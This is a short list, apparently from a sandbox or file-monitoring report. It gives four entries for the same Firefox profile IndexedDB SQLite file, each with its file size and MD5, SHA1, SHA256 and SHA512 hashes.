C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ptqf56iz.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
Filesize9.6MB
MD5c23829c2c3bfa71b7fb242d145f6f539
SHA1360ba9f64f07e815dcdef2b40951030d2ec09fff
SHA256d87fd7b5287e7bd0eee8eacc9bb3e9a3ac3cc4d06130a9add96179a4b9cb85b5
SHA5123df9f237e99ab509b48c565185c5c15028e1a45db7efd1b290def796aee8ca4c557ea94c189f575abc96337a9b9f8b014bf718ce6c99366377fe373c198f5aa6
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ptqf56iz.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
Filesize10.4MB
MD502f921ec918f065ca91cbb86f1d9a44e
SHA1704b7d56cd95106cb275e465fc33264c070f6ed4
SHA256ae1c03fb2ac2968beef73bc8aecc3c44f10b141b8ec1bb666c10364ceb41b204
SHA512fa2f4d15ab5f028d27c87b59f3d28ebe05172337d58d25f52ffee673887bf9d5f63c20fd556e04cb01c94ff52c0328d4ecc70f4c33b984aab92702fef9ae8ec5
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ptqf56iz.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
Filesize10.4MB
MD5b56ae1907c7454263fe9f6caebacc5b0
SHA199413d011490dcf4a71a641149395818546ed919
SHA25650a75bf4cd932c9d2bc5d157ad79ef5800f02a1de488fdd9c247a1a421f9de0f
SHA5128b57a45b8e502a049efa10bde99b5defa6cf6fdee07142563c6cf96db5a9c32a9a861d5730b019bd2ae0e3f0448c29d9541f25bc4541ffacba273d986521a37c
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ptqf56iz.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
Filesize10.4MB
MD531650f98c1e59ad247d4d937e84726a3
SHA1f3091fa10737ff2a15a2c5f6fb02d65a072fc8e8
SHA25637e5adb9050d0c635cde82868911a347099245905215b1d7c397427eda3b3ddb
SHA512fb8ba10bbb73d35f92b3fca806488b05a4abfa88339ab0f9004aed7f3334ed655243ceb665f256f7e136b6cbf655d0f88a8ec69cc69f3cfb702360dc97c6f870